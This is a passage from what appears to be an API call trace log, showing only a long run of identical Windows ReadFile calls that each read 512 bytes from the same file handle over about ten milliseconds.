(in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.232] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.233] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.234] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.235] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.236] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.237] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: 